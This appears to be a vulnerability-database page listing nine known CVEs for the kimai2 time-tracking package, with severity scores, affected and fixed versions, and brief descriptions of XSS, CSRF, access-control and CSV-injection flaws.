kevinpapst/kimai2
Packagist9 known CVEs affecting this package
Aggregated from OSV, GitHub Security Advisories, NVD, and vendor advisories. Each CVE links to its full detail page with vendor advisories, patches, fixed versions, and remediation guidance.
CVEs affecting kevinpapst/kimai2page 1 of 1
- CVE-2019-15481MEDIUMCVSS 6.1EG 6.1✓ Fixed in 1.12019-08-23
vulnerable: 0.1 ... 1.0.1 (13 versions)
Kimai v2 before 1.1 has XSS via a timesheet description.
- CVE-2021-3957MEDIUMCVSS 4.3EG 4.3✓ Fixed in 1.162021-11-19
vulnerable: 0.1 ... 1.9 (44 versions)
kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)
- CVE-2021-3963MEDIUMCVSS 4.3EG 4.3✓ Fixed in 1.162021-11-19
vulnerable: 0.1 ... 1.9 (44 versions)
kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)
- CVE-2021-3976MEDIUMCVSS 6.5EG 6.5✓ Fixed in 1.16.22021-11-19
vulnerable: 0.1 ... 1.9 (46 versions)
kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)
- CVE-2021-3983MEDIUMCVSS 6.1EG 6.1✓ Fixed in 1.16.32021-12-01
vulnerable: 0.1 ... 1.9 (47 versions)
kimai2 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- CVE-2021-3985CRITICALCVSS 9.0EG 9.0✓ Fixed in 1.16.32021-12-01
vulnerable: 0.1 ... 1.9 (47 versions)
kimai2 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- CVE-2021-3992MEDIUMCVSS 6.5EG 6.5✓ Fixed in 1.16.32021-12-01
vulnerable: 0.1 ... 1.9 (47 versions)
kimai2 is vulnerable to Improper Access Control
- CVE-2021-4033MEDIUMCVSS 6.5EG 6.5✓ Fixed in 1.16.72021-12-09
vulnerable: 0.1 ... 1.9 (51 versions)
kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)
- CVE-2021-43515HIGHCVSS 7.8EG 7.8✓ Fixed in 1.14.12022-04-08
vulnerable: 0.1 ... 1.9 (34 versions)
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.
Check whether kevinpapst/kimai2 is used in your infrastructure
EchelonGraph scans your cloud and SBOMs to map every package to your actual deployments. See blast radius for kevinpapst/kimai2 CVEs against the assets you own.
Start Free Scan →